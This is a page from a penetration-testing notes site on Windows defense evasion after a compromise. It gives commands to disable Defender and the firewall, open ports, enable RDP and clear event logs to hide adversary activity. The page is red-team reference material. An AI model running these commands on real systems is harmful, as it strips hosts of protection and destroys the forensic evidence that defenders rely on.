InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Windows Defender
  • Windows Firewall
  • Activate RDP
  • Windows logs clearing
  1. Windows
  2. Post exploitation

Defense evasion

Windows Defender

The following PowerShell command can be used to switch off Windows Defender real-time protection:

# Add the specified folder to Windows Defender's exclusion list.
# The exclusion list can be retrieved using: Get-MpPreference | Ft ExclusionPath
Add-MpPreference -ExclusionPath "<PATH>"

# Disables Windows Defender real-time protection.
Set-MpPreference -DisableRealtimeMonitoring $true

# Disables, in addition to real-time protection, various other protections offered by Microsoft Defender (scanning of scripts and downloaded files, automatic sample submission, etc.).
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Windows Firewall

To check whether the Windows Firewall is enabled on a server or computer, the following command can be used as Administrator / SYSTEM:

# Show the profile applied to each network adapter
netsh advfirewall monitor show currentprofile

# Windows Firewall state for all profile (Public / Domain / Private)
netsh advfirewall show allprofiles
Get-NetFirewallProfile

# Show all rules for the given profile
netsh advfirewall firewall show rule profile=<public | private | domain | any | ...> name=all
Get-NetFirewallProfile -Name <Public | Private | Domain | * | ...> | Get-NetFirewallRule

By default, three separate listings are present: Domain profile settings, private profile settings and public profile settings. With the private profile, applied to a network adapter when it is connected to a network that is identified by the user or administrator as a private network, Windows enables network discovery features, allows file sharing and other networked features. The public profile, applied to a network adapter by default or if specified so by an user or administrator, is the most restrictive profile. In the default public profile, Windows will block all inbound connections to programs that are not on the list of allowed programs. Finally, the Domain profile is used when a server or computer is joined to an Active Directory domain. In this environment, firewall settings are typically (but not necessarily) controlled by a network administrator.

Windows blocks inbound connections and allows outbound connections for all profiles by default.

To disable the firewall use the following commands:

# Disable current profile
netsh advfirewall set currentprofile state off

# Disable all profiles
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -All -Enabled False

# Disable the private, public and domain profiles
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set domainprofile state off
Set-NetFirewallProfile -Profile <Domain | Private | Public | PROFILE NAME> -Enabled False

To open a specific port, or a range, use the following command:

netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localport=<PORT> action=allow

Activate RDP

RDP can be enabled / disabled with out the need to restart the system with the reg utility:

# Check if RDP is enabled
netstat /p tcp /a | findstr 3389
# If RDP is enabled, registry value should be equal to 0x0
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Windows logs clearing

Windows event logs track the activity and a number of operations conducted on the system.

The following notable hives, located in %systemroot%\System32\winevt\Logs, may be of interest for forensics analysis (and should thus be deleted in priority to hide adversary activity):

  • Security.evtx: users logon / logoff, local accounts and groups operations, process creation with command line if activated, etc.

  • System.evtx: Windows service creation operations (creation, execution, deletion, etc.)

  • Windows PowerShell.evtx and Microsoft-Windows-PowerShell%4Operational.evtx: PowerShell activity, with a varying level of information depending on the system configuration (activation of non default Module Logging, Script block logging, etc.)

  • Microsoft-Windows-TaskScheduler%4Operational.evtx: scheduled tasks operations (registration, execution, deletion, etc.).

  • Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx, Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational, and Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx: RDP activity such as access to the Windows login screen and remote interactive logon through.

  • Microsoft-Windows-WinRM%4Operational

  • Microsoft-Windows-Shell-Core%4Operational.evtx: programs executed through the Run / RunOnce ASEPs registry keys.

  • Microsoft-Windows-AppLocker%4EXE and DLL.evtx and Microsoft-Windows-AppLocker%4MSI and Script (and others Microsoft-Windows-AppLocker%4*.evtx): execution of binaries and scripts if AppLocker is activated in Audit only mode (non default).

Note that upon clearing of some EVTX hives (such as the Security and System hives), specific events will be generated to keep trace of the logs clearing. Refer to the [DFIR] Windows - EVTX integrity note for more information on the Windows events generated by events deletion.

# Clears the specified hive using the wevtutil built-in utility.
wevtutil cl <security | system | HIVE_NAME>

# Clears the specified hive using the Clear-EventLog PowerShell cmdlet.
Clear-EventLog -LogName <Security | System | HIVE_NAME>

# Clears all the logs of the registered ETW provider.
$AllLogs = Get-EventLog -List | ForEach-Object {$_.Log}
$AllLogs | ForEach-Object {Clear-EventLog -LogName $_ }

https://github.com/QAX-A-Team/EventCleaner

PreviousCredentials dumpingNextLocal persistence

Last updated 3 years ago